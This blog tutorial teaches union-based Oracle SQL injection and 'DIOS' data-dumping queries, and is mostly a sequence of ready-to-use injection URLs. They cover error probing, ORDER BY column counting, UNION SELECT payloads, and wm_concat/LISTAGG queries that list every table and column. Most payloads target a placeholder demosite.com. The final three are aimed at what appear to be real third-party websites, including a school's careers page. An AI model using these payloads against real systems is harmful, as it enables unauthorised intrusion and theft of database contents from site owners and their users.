Oracle SQL Injection and DIOS Query

Post Image
In the Name of ALLAH the Most Beneficent and the Merciful

After getting a lot of request on adding other DIOS and other database ralated Injection tutorials on Securityidiots. Here we are up with Oracle Based SQL Injection and DIOS tutorial

Here is the basics of Oracle Union Based Injection which you can use to inject oracle based sites Union Based Oracle Injection

I hope reading the above Union Based Oracle Injection now you know how to inject a oracle based site, now we ll inject "http://demosite.com/page.php?id=1" in our tutorial. Lets see if the below input gives us an error. Before we start watch this basic video which contains how to use some of the queries below, then you can read the tutorial which gives more explained and some other examples of oracle DIOS and injection.


http://demosite.com/page.php?id=1'
Now if we have the error lets balance the query.

http://demosite.com/page.php?id=1' order by 1--
No Error
http://demosite.com/page.php?id=1' order by 8--
No Error
http://demosite.com/page.php?id=1' order by 9--
Error
Now we know 8 was the last column to work, so we can now try union based.

http://demosite.com/page.php?id=1'and 0=1 union select 111,222,333,444,555,666,777,888--
If you get some error then try
http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
and find the vulnerable column manually, but suppose that too dont work then try this.
http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--
Hopefully mixing one of the above tricks may work.
Lets assume 3rd is the vulnerable column, which is getting printed on screen. Lets start extracting data via the third column, first of all we ll extract the database version.

To get the version we use (select banner from v$version where rownum=1)
http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,(select banner from v$version where rownum=1),NULL,NULL,NULL,NULL,NULL--
Now lets get the current database using SYS.DATABASE_NAME.

http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,SYS.DATABASE_NAME,NULL,NULL,NULL,NULL,NULL--
Now the rest of the part we will do using DIOS (Dump in one shot) for Oracle. Unlike other DBS Oracle DIOS is simple where we just use the function wm_concat to extract data from the database.

http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,(SELECT replace(wm_concat('<li>'||table_name),',','') FROM all_tables),NULL,NULL,NULL,NULL,NULL--
The above query will give you all tables, now lets get columns for a table, but thats not all theres more of what you can do :D. As wm_concat is limited in output we cant call it a complete DIOS, so yes we ll soon work on some other versions for Oracle DIOS, but for now here are some other ways you can try.

http://www.technoriunite.it/pages.php?p=cut-linear') and 1=0 union select null,'">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--' ,NULL,NULL from dual --&lang=it
http://www.beaconhouse.edu.pk/cms_main_career.php?id=9&subpg=1&pjobid=-22050 and 0=1 UNION+SELECT NULL,(select wm_concat('<li>'||table_name||':'||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum<120)||'<!--',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--
http://www.technoriunite.it/pages.php?p=cut-linear') and 1=0 union select null,'">'||(select wm_concat('<li>'||table_name||':'||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum<120)||'<!--' ,NULL,NULL from dual --&lang=it
Thats all for now, see you soon with our next tutorial :D
Newer post

MSSQL practical Second Order Exploitation

MSSQL practical Second Order Exploitation
MSSQL Second Order Exploitation
Older post

MSSQL Second Order Exploitation